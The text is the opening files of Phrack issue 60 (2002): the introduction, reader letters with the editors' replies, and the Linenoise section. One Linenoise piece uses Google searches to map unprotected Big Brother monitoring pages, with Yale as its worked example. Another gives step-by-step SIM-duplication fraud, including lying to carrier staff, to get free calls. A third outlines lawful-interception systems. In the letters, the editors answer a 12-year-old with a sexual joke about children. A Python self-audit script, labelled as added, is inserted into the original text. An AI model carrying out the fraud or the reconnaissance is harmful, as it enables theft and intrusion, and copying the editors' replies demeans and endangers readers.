Phrack #60

                           ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x01 of 0x10


               _.                      _
              *  `.__________________.'_'._       ___ ___
           /|_____/`._____:    /_____     `._____/  //  /_______|\
          /      \  _`._  \   //   _ \____  `.     //  /  .*      \
         (        \ \  `. /  /_\  /__/   /  / /.__     \.'         )
          \  _____/  \___`.     )    \  :  /  \ `.  \   \_______  /
           \|    /___/ /___/.__/__/\__\___/\_____/_._\____\     |/
                           `-' pHRACK#6o          `-'


Jingle bells jingle bells jingle all the way...X-MAS TIME IS PHRACK-MAS TIME.

Wow, number #60 is out. Who ever thought that we will get that far :> Let's
take a look back in time who kept phrack going over all these years. Ladies
and gentlemen, we are proud to present the final, latest, incomplete and

DATE        NAME                                        PHRACKZ
2001-08-11                                              (p57..)
1997-09-01 route                                        (p51..p56)
1997-04-09 route, Datastream Cowboy                     (p50)
1996-11-08 route, Datastream Cowboy, Voyager            (p49)
1996-09-01 Voyager, ReDragon, route                     (p48)
1993-03-01 Erik Bloodaxe                                (p42..p47)
1991-09-15 Dispater                                     (p33..p41)
1990-05-28 Crimson Death                                (p31..p32)
1988-10-12 Taran King + Knight Lightning                (p20..p30)
1988-06-07 Crimson Death                                (p18..p19)
1988-04-07 Shooting Shark                               (p17)
1987-11-01 Elric of Imrryr                              (p16)
1985-11-17 Taran King + Knight Lightning                (p01..p15)

..we came a long way...

What's new?

We revived Phrack Prophile to honor those who did some kewl stuff for
the scene.

This issue comes with a new section dedicated to tool announcements
(Phrack armory). It showcases selected tools that have been released during
the last few months and that we consider cool enough to be mentioned here.

|=[ Table of Contents ]=-------------------------------------------------=|
| 0x01 Introduction                                 Phrack Staff 0x009 kb |
| 0x02 Loopback                                     Phrack Staff 0x00b kb |
| 0x03 Linenoise                                    Phrack Staff 0x01e kb |
| 0x04 Toolz Armory                                 Packet Storm 0x00b kb |
| 0x05 Phrack Prophile on horizon                   Phrack Staff 0x009 kb |
| 0x06 Smashing The Kernel Stack For Fun And Profit         noir 0x03e kb |
| 0x07 Burning the bridge: Cisco IOS exploits                 FX 0x028 kb |
| 0x08 Static Kernel Patching                             jbtzhm 0x072 kb |
| 0x09 Big Loop Integer Protection                 Oded Horovitz 0x067 kb |
| 0x0a Basic Integer Overflows                            blexim 0x01b kb |
| 0x0b SMB/CIFS By The Root                                ledin 0x07c kb |
| 0x0c Firewall Spotting with broken CRC                    Ed3f 0x026 kb |
| 0x0d Low Cost and Portable GPS Jammer                anonymous 0x021 kb |
| 0x0e Traffic Lights                                   plunkett 0x015 kb |
| 0x0f Phrack World News                            Phrack Staff 0x018 kb |
| 0x10 Phrack magazine extraction utility           Phrack Staff 0x015 kb |
|=------------------------------------------------------------=[ 0x282 kb |

  The latest, and all previous, phrack issues are available online at Readers without web access can subscribe to the
phrack-distrib mailinglist. Every new phrack is sent as email attachment
to this list. Every new phrack issue (without the attachment) is announced
on the announcement mailinglist.

To subscribe to the announcement mailinglist:
$ mail [email protected] < /dev/null

To subscribe to the distribution mailinglist:
$ mail [email protected] < /dev/null

To retrieve older issues (must subscribe first):
$ mail [email protected] < /dev/null
$ mail distrib-get.<n> < /dev/null
where n indicated the phrack issue [1..60].

Enjoy the magazine!

Phrack Magazine Vol 11 Number 60, Build 3, Dec 28, 2002. ISSN 1068-1035
Contents Copyright (c) 2002 Phrack Magazine.  All Rights Reserved.
Nothing may be reproduced in whole or in part without the prior written
permission from the editors. 
Phrack Magazine is made available to the public, as often as possible, free
of charge.

|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|

Editors           : [email protected]
Submissions       : [email protected]
Commentary        : [email protected]
Phrack World News : [email protected]

  We have some aggressive /dev/null-style mail filter running. We do reply
to every serious email. If you did not get a reply, then your mail was 
probably not worth an answer or was caught by our mailfilter. Make sure 
your mail has a non-implicit destination, one recipient, a non-empty 
subject field, and does not contain any html code and is 100% 7bit clean
pure ascii.


Submissions may be encrypted with the following PGP key:



phrack:~# head -22 /usr/include/std-disclaimer.h
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.

|=[ EOF ]=---------------------------------------------------------------=|


                           ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x02 of 0x10

|=----------------------=[ L O O P B A C K ]=----------------------------=|
|=------------------------=[ phrackstaff ]=------------------------------=|

----| QUOTE of the month

    [ Once upon a time in #phrack ]

<OUAH:#phrack> *** PHRACK #60 SCHEDULED FOR 2002-12-27 ***
<chmod_:#phrack> i know
<chmod_:#phrack> its already 2 hours late
<phrack_webmaster_undercover:#phrack> is it already the 27th?
<chmod_:#phrack> yes
<chmod_:#phrack> in some parts of the world
<bajkero:#phrack> Fri Dec 27 02:01:13 CET 2002

    [ Meanwhile: phrack_webmaster_undercover doing the
      s/27th/28th/g thingie on index.php ]

<phrack_webmaster_undercover:#phrack> hmm. strange, it reads 28th here.
<chmod_:#phrack> they changed recently
<chmod_:#phrack> it was 27th just one hour ago
<phrack_webmaster_undercover:#phrack> mysterious...

----| Statistics of the month

[email protected]:/var/log > grep '\.mil' httpd_access.log | uniq | wc -l
[email protected]:/var/log > grep '\.gov' httpd_access.log | uniq | wc -l

|=[ 0x01 ]=--------------------------------------------------------------=|

Editor in Chief!!!!

[ Nope, sorry I'm just the phrackstaff's slave answering the emails. ]

I have been trying to get the phrack magazine but up to date I have not
succeeded.. I come from an African country called "kenya" and it seems they
don't bring them there!!!!!! Please send me the subscription and the
magazines if it is possible and bill me later,.....

[ Kenya, 1.00North, 38.00East, 582,650sq, highest point you can read
  phrack: Mount Kenya 5,199m, lowest point: Indian Ocean (0m hehe.).
  Potential number of phrack readers: 31,138,735. Hacker growth rate: 1.15%,
  hackers life expectancy at birth: 47.02 years, Literacy: age 15 and over
  can read phrack. 78.1% of the total population can read phrack.
  http://www.cia.giv/cia/publications/factbook/geos/ke.html ]

My address is [email protected]

Yours truly


[ Phrack is free. Nice to know that phrack is read in all parts of the
  world, we definitely want to hear from you more often ]

|=[ 0x02 ]=--------------------------------------------------------------=|

From: Omar Tarabay <[email protected]>
Subject: a real newbie

Hey guys,

    [ Hello dude ]

I read your last edition and it was just great, i visited the site daily
to see if the new edition is down or not.

    [ oh, so that's you in the weblogs? Hi :> ]

I really liked the files on your last edition (lockpicking was the greatest)
i won't ask questions that you expect me to ask like 'please tell me how to
hack into hotmail or the pentagon'.

    [ Oh man, you missed it, I had some 0day for you ]

but i read myself and learn things myself but as a newbie i don't find
most of your articles understandable, its only for experts and pros so
if you can write articles for newbies like me and many others who want to
learn please do, and about myself i am TURBOWEST (i am sure that u can know
my real name easily but please don't say it)

    [ Your real name is: TURBOEAST! ]

I am 12 y/o

   [ Nothing to be ashamed of. We will be at the same age in 13 years. ]

I program in python . I am trying to install linux on my PC but i face
some problems which i am trying to solve(i read a lot of books about

    [ You read these linux books? What did they teach you? How to format
      your harddrive, install a webcam and masturbate with 13 years old 
      girls on netmeetings? ]

finally i would like to say thanks for all the phrack staff and ask them to
reply to me.


   [ Nothing. Hope you won't get any problems with the pedophile child
     molesters who get back to you now... ]

|=[ 0x03 ]=--------------------------------------------------------------=|

From: George escobar <[email protected]>
Subject: thanks

i found your site informative. thanks  

    [ at your service! We dont take money donation, however you can send
      female shaped human beings. ]

|=[ 0x04 ]=--------------------------------------------------------------=|

From: "Anthony Webb" <[email protected]>
Subject: OK..I'm stupid, but help me anyway

OK, I admit it...I love the website, but I can't find my way around in it.
Yeah, I know, I'm dumber than a bag of rusty hammers.  But I need help.

    [ It is a good start to admit it, let's look at your case ]

I am looking for a simple program to keep track of my company's phone calls
without the company knowing I'm doing it.

    [ Oh man ... that's not good at all ... ]

No, I am NOT paranoid, they ARE out to get me.

    [ Honestly, you are not! Be prepared for the worst! Watch Jackie Chan
      and Akira movies on a daily base to train your ninja-style to be
      prepared to whatever there might come. Huh? Did you hear that? ]

I don't have $1100 to $2500 to spend on Call Accounting Software and I
don't need all those bells and whistles anyway. I just need to keep track
of who the people are talking to, what time, what extension, whether its
outbound or inbound, etc. The company has an Avaya (Lucent) Merlin Magix
PBX system. By tracking who they call I can establish that they are indeed
guilty of harassment against my paranoid little butt.

Got any ideas? gentle....but pissed at the organization.

    [ Are you sure that noone of your coworkers watched this email? ]

|=[ 0x05 ]=--------------------------------------------------------------=|

From: [email protected]

can I please get those zines in zip format, they are interesting, but I use
windows. If not, can you complete the articles? I was reading one, and it
was in txt and it said 9 of 10. there was no link to the 10th article. this
happened many times with different ones. Yeah anyways, it would be nice to
have those as zip files for those who don't have linux as would many others,
or at least fix the links. (not much of a problem just missing a page)
Great magazine, I just wish that I could complete it. thanx.

[ (man winzip) || (man google) || (man brain) || (man life) || (man gun) ]

|=[ 0x06 ]=--------------------------------------------------------------=|

From: "melissa royer" <[email protected]>


I am having some trouble compiling the code extracted from your site. I
have the code on linux RH 7.3 Is this the problem??

[[email protected] Loki]# make linux

make[1]: *** [surplus.o] Error 1
make[1]: Leaving directory `/loki/loki2/Loki'
make: *** [linux] Error 2

[ I swear this dood^H^H^H^H Melissa really tried to compile that 7 years old
  source from p49. Unless we turn into a red-hat-gcc-problems-support-center
  will we not give any hints. Rumours about any fusion on the latter topic
  can not be confirmed or denied at this point. ]

|=[ 0x07 ]=--------------------------------------------------------------=|

[ someone with a 'new' and 'unbreakable' crypto idea of his own ]

[ blah blah ] ...didn't know Applied Cryptography, thanks for the link.
[ blah blah ] time pad are maybe not very useful but they are for
hackers ...[ blah blah ]. When a friend of mine rooted NASA i used one-time
pads to tell my other friends [ blah blah blah ].

[ So what's your general recommendation then? That we should banish
  blowfish and use one-time-pad's because they are..err..better when
  we want to tell our...err..friends that we ..err..hacked NASA? hu? ]

|=[ 0x08 ]=--------------------------------------------------------------=|

From: "Bowman, Michael" <[email protected]>


    [ Dear Government Of Education, you failed to subscribe where your
      our scholars already succeeded. Please ask your classmate if you
      have any further problems. We are awaiting your second trial until
      next monday or we are urged to inform the director about your lack
      of success. ]

|=[ 0x09 ]=--------------------------------------------------------------=|

[ from web comments to phrack 3-9, 2002-11-07 ]
From: [email protected]

I want to download some material from your website.

    [ Our links are protected by some kind of intelligent checker. You
      have to press ALT-Q while clicking on the link (quickly!). ]

|=[ 0x0a ]=--------------------------------------------------------------=|

From: "Dustin Smith" <[email protected]>
Subject: The unfortunate life...

Well you may know me as the "script kiddy" but lately i am having
illusions of Grandeur and am aspiring to be...I don't dare say it
cuz I am still so far off but yet so close.  So a subscription to your Holy
grail will be just peaches...In all humbleness of the greatness
that is possessed by few I bid you adieu...

    [ THIS IS NOT MADE UP! We really get these kind of emails! ]

Broadband? Dial-up? Get reliable MSN Internet Access. 

    [ Get a brain first! ]

|=[ 0x0b ]=--------------------------------------------------------------=|

From: "Princess Of Darkness" <[email protected]>
Subject: symantec

uhh... hello.


My name's Rosie. hi.  I really actually know very little to nothing about 
hacking..  and it'd like to know more.  I know links, websites, etc. etc.  

    [ That's a beginning!
      Lesson2: "How do I read the website".
      Lesson3: "How do I understand the website"
      Lesson4: "How do I utilize the website"
      Lesson5: "How do I hire for a lawyer"
      Lesson6: "How do I escape the feds" ]

but when you can't even write html it makes things a little difficult.  God 
I feel so retarded. don't laugh. I'm a lam0r, i know.

    [ The real reason why phrack comes as .txt is because noone knows
      this < > -thingie either. ]

anyway, thanks a lot for like.. reading this...

    [ thanks a lot for like.. writing this... ]

and uh..  don't find out where i live..  cos that's.. scary..  O.o;;


|=[ 0x0c ]=--------------------------------------------------------------=|

From: anthony charles <[email protected]>

Dear editor,

i was directed by somebody i met online that i should
contact your mag about being a hacker. I'm resident in
Nigeria, West Africa. i would be very grateful if you
can assist me because it has been my dream to be a

The users in the hackers lounge in yahoo chat are too
fast for me. i need to learn the rudiments of becoming
a hacker. Every start's somewhere...this is where i
start if you would honor me by imparting knowledge to
an eager student.

Awaiting your reply.
yours sincerely
Anthony Charles

    [ no comment ]

|=[ EOF ]=---------------------------------------------------------------=|


                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|

--[ Contents

  1 - The Dark Side of NTFS
  2 - Watching Big Brother
  3 - Free mobile calls
  4 - Lawfully Authorized Electronic Surveillance [LAES]
  5 - Java Tears down the Firewall

--[ 1 - The Dark Side of NTFS

Ok, this didn't fit anywhere else so we put it here:

--[ 2 - Watching Big Brother

        by da_knight <[email protected]>

    Have you ever wanted to be the one doing the watching? If you are a
system administrator of UNIX / Linux servers, then you may be aware of a
product called Big Brother, which can be downloaded from ''.
This article is by no means technical, simply because it doesn't need to
be. It is divided into two sections, so bear with me for the briefing on
Big Brother (BB).

    BB is a program that will monitor various computer equipment; things it
can monitor are connectivity, cpu utilization, disk usage, ftp status, http
status, pop3 status, etc. As you might imagine, this information is very
important to an organization. BB is your standard client / server setup.
The server software can run on various flavors of UNIX, Linux and NT. The
client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and
VAXEN; some client software is provided by 3rd-party vendors and not
supported by BB4 Technologies.

    The cool thing about this is all of this information is viewed on a web
page. So, if you have multiple servers that you have to maintain, with this
product you would be able to go to one web page and quickly get a status of
all of those servers - pretty handy. When everything is fine your status is
"green", major problems are indicated by "red".

    Example: The connectivity (conn) status is done by pinging the
equipment in question; if the ping fails then it would appear as a red zit
on the web page. When tests such as this fail, BB can be configured to
automatically page the administrator.

Here is a quick run down of the statuses, listed in order of severity:

red    - Trouble; you've got problems.
purple - No report; the client hasn't responded in the last 30 minutes.
yellow - Attention; a threshold has been crossed.
green  - OK; take the day off.
clear  - Unavailable; the test has been turned off.
blue   - Disabled; notification for this test has been turned off.

    The status is also reflected in the title of the web page, so it only
takes one red zit to cause the web page title to start with "red:Big
Brother"; we're going to get into this in a minute.

    A common thing for administrators to do is to monitor their most
important systems with this product, as well as the most important aspects
of each system. If you have a web server, you would want to monitor the
http and conn statuses just to make sure people are still able to connect
to the server. Other tests I have seen are to check Oracle, or to list all
connected users. Hell, they even have a way to add weather reports. The
point is, it's pretty limitless what can be monitored, it just depends on
what you deem important.

    Now that you have a little bit of an understanding what BB can do, I
want to quote two things from BB4 Technologies (BB4) FAQ - Section 5:
Security Considerations (
Everything in that section of the FAQ should be considered, but we'll focus
on these two.

    "BB does not need to run as root. We suggest creating a user 'bb' and
running bb as that user." "We recommend password-protecting the Big Brother
web pages"

    So, you ask yourself, why are these things important to me? Well, one,
you know that administrators who run this software probably have it setup
using the user 'bb', and that they may also be running it with root level
access. This gives you a valid user account on a system and this account
probably wouldn't be used by a human very often so the password could be
something simple. But that's not the point of this article. The second
thing is that BB4 realizes the information on these web pages is extremely
important and they recommend password-protecting them.

    Following this logic you then say these are web pages, so it's running
on a web server and if they're not password-protected and the server is
visible to the WWW, then...that's right search engines will find these
pages and serve them up when you know what to look for.

    What are you waiting for? Go to '' and search for
"green:Big Brother" (include the quotes; it makes it more refined). You
will get about 16,200 matches. Now that doesn't mean that those are all
unique because it will have numerous pages from the same site, but you get
the point. I would estimate that there are over 200 sites that can be
viewed this way. Remember to search for all the other statuses too, just
change the name of the color. One more thing, I chose Google for a reason.
Some of these sites no longer run the BB product, but Google has a nice
ability to view cached pages, so you can still glean information from them.

    After you scroll through the list of sites you will realize that the
majority of them are either small ISP's or colleges. I'm going to pick on a
college, an Ivy League one, no less. I can tell you from looking at this
particular BB site that the BB server is running on a computer called
'' and the IP address is ''. Also the
computer '' is having some serious issues. How did I
find the IP address? Simple; if you click on the "green" or whatever color
button under the "conn" column, you will see a web page that has
information similar to this:

--------------------------------------------------------- - conn

green Sun Jun 30 01:33:15 EDT 2002 Connection OK
PING ( from : 56(84) bytes of data.
64 bytes from icmp_seq=0 ttl=255 time=379 usec

--- ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms


    Right there you know that the ping command was trying to ping
'', in this case, '' and that it came
from '' or ''. Let's see what else we can
find out.

    I can see that almost all of their servers run Tripwire, so they are
UNIX systems, and you probably would have a hard time creating a backdoor
account on these systems. On another page, we get to see the users who are
currently logged in. Currently we have 33 users logged in, and seeing as
it's 1:33 AM, I think some people left their computers logged in.

    I want to get more information about Yale's servers, so let's go back
to Google and look for another page from Yale, but this time look for
''. Now we can get some good information. When this site
is displayed you will see quite a few servers listed, as well as several
departments. If you want to know what software '' is
using to run its HTTP services just click on the 'green' button:

---------------------------------------------------- - http

green Sun Jun 30 01:45:21 EDT 2002 - Server OK
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location:
Date: Sun, 30 Jun 2002 05:45:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT
ETag:
Content-Length: 2226

Seconds: 0.01 


    What the hell? They're actually running IIS 4.0? Don't they know how
insecure that is? But I digress. From that information you know that the
server is some version of Windows NT and it has IIS 4.0 running, that could
be handy.

    Zelda is also showing they monitor printers. Now that can be fun; what
if the message "I think therefore I hack!" is sent to the printer
''? And in case you're wondering, the
printer is an 'HP LaserJet 4050 Series'; I just had to click on the button
under the "printer" column to find that out.

    Elsewhere on this same site, I find that several servers are running
TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly
tell you what version of the software they are running. Oracle, for
instance, is even nice enough to show you all of the connected users. How
can you thank them enough for this valuable information?

    Also, it seems only the geologists at Yale feel they have data that is
of great importance. I wasn't able to view what they monitor because of
access permissions on their web site, but I do know that they are running
their web server on Apache version 1.3.26.

    As you can see, I would be able to gather an enormous amount of vital
infrastructure data in a few minutes. Plus, I didn't break any laws. These
web pages are posted in a manner that the entire world can view them. It
might take someone 10 minutes or more to find out a few facts about 1
particular system, but in that amount of time I found numerous facts about
over 40 systems at the same organization. Thanks Big Brother!

    I feel it should be mentioned that the information found on these web
pages is information that most organizations don't even let employees
outside of the IT department see. I guess I should feel special since Yale
must feel that I'm not a security risk, otherwise they would have made me
authenticate to their web sites.

    Imagine this; an ISP that lists all of their routers complete with IP's
and model information. If you had that, you could possibly rely on
vulnerabilities in SNMP discovered earlier this year, or better yet, rely
on the default accounts / passwords setup on these types of devices. I only
bring this up because I know I did come across an ISP that did list routers
and the majority of the sites returned by Google seemed to be smaller ISPs.

    Also, about searching on Google, I would recommend searching for
"red:Big Brother", because these pages will always give you more
information than when the system is running perfectly.

    Finally, I didn't write this article to condone breaking into systems
and providing a means to that end. I wrote this because security is
extremely important; with the information that is found because of this one
product your environment could be compromised. If you are a system
administrator for a site that shows up on Google you may want to secure
your BB web pages, because by the time you read this the world is going to
know your infrastructure.
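
    Added example (not part of the original article and not code from BB4
Technologies): a self-audit an administrator can run over responses captured
without credentials from their own Big Brother URLs, flagging pages that were
served unauthenticated and listing the IP addresses and Server banners they
disclose. The host names, the /bb/ path and the sample pages are constructed
for illustration.

```python
import re
from html.parser import HTMLParser

# The six status colours listed in the article, most severe first.
BB_COLOURS = ("red", "purple", "yellow", "green", "clear", "blue")
# BB puts the worst current status in the page title, e.g. "red:Big Brother".
TITLE_RE = re.compile(r"\s*(" + "|".join(BB_COLOURS) + r"):Big Brother", re.I)
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_RE = re.compile(r"\b" + OCTET + r"(?:\." + OCTET + r"){3}\b")
# Service banners echoed into http test detail pages ("Server: ...").
BANNER_RE = re.compile(r"^Server:\s*(\S.*)$", re.I | re.M)


class TitleParser(HTMLParser):
    """Collects the text of the <title> element."""

    def __init__(self):
        super().__init__()
        self.in_title = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False

    def handle_data(self, data):
        if self.in_title:
            self.title += data


def audit_response(url, status, body):
    """Classify one response fetched WITHOUT credentials from your own BB URL."""
    finding = {"url": url, "verdict": "not-bb", "colour": None,
               "ipv4": [], "banners": []}
    if status in (401, 403):
        finding["verdict"] = "protected"    # server refused the anonymous request
        return finding
    parser = TitleParser()
    parser.feed(body)
    match = TITLE_RE.match(parser.title)
    if status != 200 or match is None:
        return finding                       # not a BB status page
    finding["verdict"] = "exposed"           # BB page served to anyone who asks
    finding["colour"] = match.group(1).lower()
    finding["ipv4"] = sorted(set(IPV4_RE.findall(body)))
    finding["banners"] = sorted({b.strip() for b in BANNER_RE.findall(body)})
    return finding


def exposed_pages(captures):
    """Return findings for every capture that is an unauthenticated BB page."""
    findings = (audit_response(*capture) for capture in captures)
    return [f for f in findings if f["verdict"] == "exposed"]


# Constructed captures: (url, HTTP status, body). Addresses are RFC 5737
# documentation ranges; the /bb/ path is an assumption about the install.
SAMPLE_CAPTURES = [
    ("http://bb.example.edu/bb/", 200, """<html><head>
<title>red:Big Brother - Status</title></head><body><pre>
green Sun Jun 30 01:33:15 EDT 2002 Connection OK
PING db1.example.edu (192.0.2.10) from 192.0.2.5 : 56(84) bytes of data.
green Sun Jun 30 01:45:21 EDT 2002 - Server OK
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
</pre></body></html>"""),
    ("http://bb.example.org/bb/", 401,
     "<html><head><title>401 Authorization Required</title></head></html>"),
    ("http://www.example.org/", 200,
     "<html><head><title>Welcome</title></head><body>hello</body></html>"),
]

if __name__ == "__main__":
    for f in exposed_pages(SAMPLE_CAPTURES):
        print(f["url"], f["colour"], f["ipv4"], f["banners"])
```
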

--[ 3 - Free Mobile Calls

        by eurinomo

This bug can be utilized to make FREE CALLS, FREE SMS, and even FREE 

    1st you have to see if your mobile network has the bug. Just call the
service free number (so you don't waste money) and say to them that your
card is locked, that you forgot your fone in your little sister's room and
your mobile says "Sim Card is lock" or something, say that maybe your sister
has entered the wrong puk because the phone was powered off and now it's on.
Then the guy must say that you have to go to one of their Mobile Shops and
explain the problem and they will give you another card with the same number
and money as the old. Ask them how much it will cost and the guy must say
it's for free! :-)

Now the material that you'll need:
- A mobile phone not nokia (it's better to be yours and not unlocked)
- And a nokia (can be an unlocked 1 or stolen or borrowed. Do as you wish!)

How to do it:

Mobile1 = Not nokia
Mobile2 = Nokia

Put the card in the mobile1 and enter your pin. When it booted up put this
code 3 times:
or try

    Check the manual and search for the code to change the puk if the above
examples don't work. Or send an email to motorola and say that you have a
motorola phone and that you want to change the puk and you know that there
is a code to change it (the code isn't illegal and it's also specified in the 

    If the code isn't the one that I have told you, it is 1 nearby. If you
have a motorola flare when you put **04* or **05* it'll say "Enter the old
Puk" or something like that automatically and then ask the new puk code 2
times. But the important thing is to lock your card, I think you can do it
also if you enter the wrong pin 3 times and then enter a wrong puk and voila
it's locked! But what I was saying about the code is that it was tested, but
you can try this last too, use it at your own risk.

    Now go to the Mobile Shop and say what happened (that your little sister
or a daughter of a friend of your mother or something like that...) And
then they will duplicate the card and they will give you the new one and the
old one. At last they normally give the 2.

    Now the easy part. Put the old card in the nokia and boot it up and you
see that it's not locked!!! and if you put it in another phone, not nokia,
it says that it's locked, the Bug is more a nokia Bug than a network Bug.
Now send a SMS with the old card and see if it discounted money. Then see if
it was discounted from the new card, if not then it's because the Network
has the bug and you can waste the money off the old card as you wish but you
only have 2 weeks or so before they cut it out of the Network and it's
completely locked, but the new card still has the same money and you can do
it again and again and I think they wouldn't catch you.

This was tested in the Portugal Vodafone Mobile Phone Network.

--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES)

           by Mystic <[email protected]>

In 1994 Congress adopted the Communications Assistance for Law Enforcement
Act (CALEA). Its intent was to preserve but not expand the wiretapping
capabilities of law enforcement agencies by requiring telecommunication
providers to utilize systems that would allow government agencies a basic
level of access for the purpose of surveillance. The act however does not
only preserve the already existing capabilities of law enforcement to tap
communications, it enhances them, allowing the government to collect
information about wireless callers, tap wireless content, text messaging, and
packet communications. The standard that resulted from this legislation is
called Lawfully Authorized Electronic Surveillance or LAES.

A Telecommunications Service Provider (TSP) that is CALEA compliant
provides means to access the following services and information to Law
Enforcement Agencies (LEAs):

1. Non-call associated: Information about the intercept subjects that is
   not necessarily related to a call.

2. Call associated: call-identifying information about calls involving the
   intercept subjects.

3. Call associated and Non-call associated signaling information: Signaling
   information initiated by the subject or the network

4. Content surveillance: the ability to monitor the subjects'

This process is called the intercept function. The intercept function is
made up of 5 separate functions: access, delivery, collection, service
provider administration, and law enforcement administration.    

----[ 4.1  The Access Function (AF)

    The AF consists of one or more Intercept Access Points (IAPs) that
isolate the subject's communications or call-identifying information
unobtrusively. There are several different IAPs that can be utilized in
the intercept function. I have separated them into Call Associated and
Non-call Associated information IAPs and Content Surveillance IAPs:

Call Associated and Non-call Associated information IAPs

- Serving System IAP (SSIAP): gives non-call associated information.

- Call-Identifying Information IAP (IDIAP): gives call associated
  information in the form of the following call events for basic
  circuit calls:

  Answer             - A party has answered a call attempt
  Change             - The identity or identities of a call has changed
  Origination        - The system has routed a call dialed by the subject
                       or the system has translated a number for the
                       subject
  Redirection        - A call has been redirected (e.g., forwarded,
                       diverted, or deflected)
  Release            - The facilities for the entire call have
                       been released
  TerminationAttempt - A call attempt to an intercept subject has been
                       detected

- Intercept Subject Signaling IAP (ISSIAP): provides access to
  subject-initiated dialing and signaling information. This includes if the
  intercept subject uses call forwarding, call waiting, call hold, or
  three-way calling. It also gives the LEA the ability to receive the
  digits dialed by the subject.

- Network Signaling IAP (NSIAP): Allows the LEA to be informed about
  network messages that are sent to the intercept subject. These messages
  include busy, reorder, ringing, alerting, message waiting tone or visual
  indication, call waiting, calling or redirection name/number information,
  and displayed text.

Content Surveillance IAPs

   The following are content surveillance IAPs that transmit content using
a CCC or CDC. An interesting note about content surveillance is that
TSPs are not responsible for decrypting information that is encrypted by
the intercept subject unless the data was encrypted by the TSP and the
TSP has the means to decrypt it. 

- Circuit IAP (CIAP): accesses call content of circuit-mode communications. 

- Conference Circuit IAP (CCIAP): Provides access to the content of
  subject-initiated Conference Call services such as three-way calling and
  multi-way calling.

- Packet Data IAP (PDIAP): Provides access to data packets sent or received
  by the intercept subject.
 These include the following services:

 ISDN user-to-user signaling
 ISDN D-channel X.25 packet services
 Short Message Services (SMS) for cellular and Personal Communication Services
 Wireless packet-mode data services (e.g., Cellular Digital Packet Data
        (CDPD), CDMA,  TDMA, PCS1900, or GSM-based packet-mode data  services)
 X.25 services
 TCP/IP services
 Paging (one-way or two-way)
 Packet-mode data services using traffic channels

----[ 4.2  The Delivery Function (DF)

   The DF is responsible for delivering intercepted communications to one
or more Collection Functions. This is done over two distinct types of
channels: Call Content Channels (CCCs) and Call Data Channels (CDCs).
The CCCs are generally used to transport call content such as voice or
data communications. CCCs are either "combined" meaning that they carry
transmit and receive paths on the same channel, or "separated" meaning
that transmit and receive paths are carried on separate channels. The
CDCs are generally used to transport messages which report
which is text based such as Short Message Service (SMS). Information
over CDCs is transmitted using a protocol called the Lawfully Authorized
Electronic Surveillance Protocol (LAESP).

----[ 4.3  The Collection Function (CF)

   The CF is responsible for collecting and analyzing intercepted
communications and call-identifying information and is the
responsibility of the LEA.

----[ 4.4  The Service Provider Administration Function (SPAF)

   The SPAF is responsible for controlling the TSP's Access and Delivery Functions.

----[ 4.5  The Law Enforcement Administration Function (LEAF)

   The LEAF is responsible for controlling the LEA's Collection Function
and is the responsibility of the LEA.

   Now that I've introduced you to LAES let's look at an implementation of
it that is on the market right now and is being used by some TSPs:

Overview of the CALEAserver:

   The CALEAserver is manufactured by SS8 Networks. It is a collection and
delivery system for call information and content. It allows existing
networks to become completely CALEA compliant. It allows for a LEA to
monitor wireless and wire line communications and gather information about
the calls remotely. The CALEAserver interfaces with the network through
Signaling System 7 (SS7) which is an extension of the Public Switched
Telephone Network (PSTN). The CALEAserver is composed of three major
layers: the Hardware Platform Layer, the Network Platform Layer and the
Application Software Layer.

    The Hardware Platform Layer consists of the Switching Matrix and the
Computing Platform. The Switching Matrix is an industry standard
programmable switch. It contains T1 cards for voice transmission and cross
connect between switches, DSP cards for the conference circuits required
for the intercept and DTMF reception/generation, and CPU cards for
management of the switch. The Computing Platform is a simplex, rack
mounted, UNIX based machine. It is used to run the CALEAserver application
software that provides Delivery Function capabilities and controls the
Switching Matrix.

   The Network Platform Layer provides SS7 capability as well as call
processing APIs for the Application Software Layer. It also controls the
Switching Matrix.

   The Application Software Layer is where the Delivery and Service Provider
Administration functions are carried out. It isolates the interfaces
towards the Access and Collection Functions from the main delivery
functionality allowing for multiple Access and Collection Functions through
the Interface Modules that can be added or modified without impacting the
existing functionality.

System Capacity:

Configurable for up to: 

1000 Collection functions 
128 Access Function Interfaces 
32 SS7 links 
512 simultaneous call content intercepts on a single call basis 
64 T1 voice facilities 

Operating Environment: 

NEBS compliant, -48 volt, 19" rack mounted equipment 
Next-generation UltraSPARC processor 
66-MHz PCIbus 
Solaris UNIX operating system 
9Gbyte, 40-MB/sec SCSI disks 
512 Mbytes RAM standard 
Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT 
Two RS-232C/RS-423 serial ports 
Programmable, scalable switch with up to 4000 port time slot interchange


Built in test tools for remote testing 
Full SS7 management system 
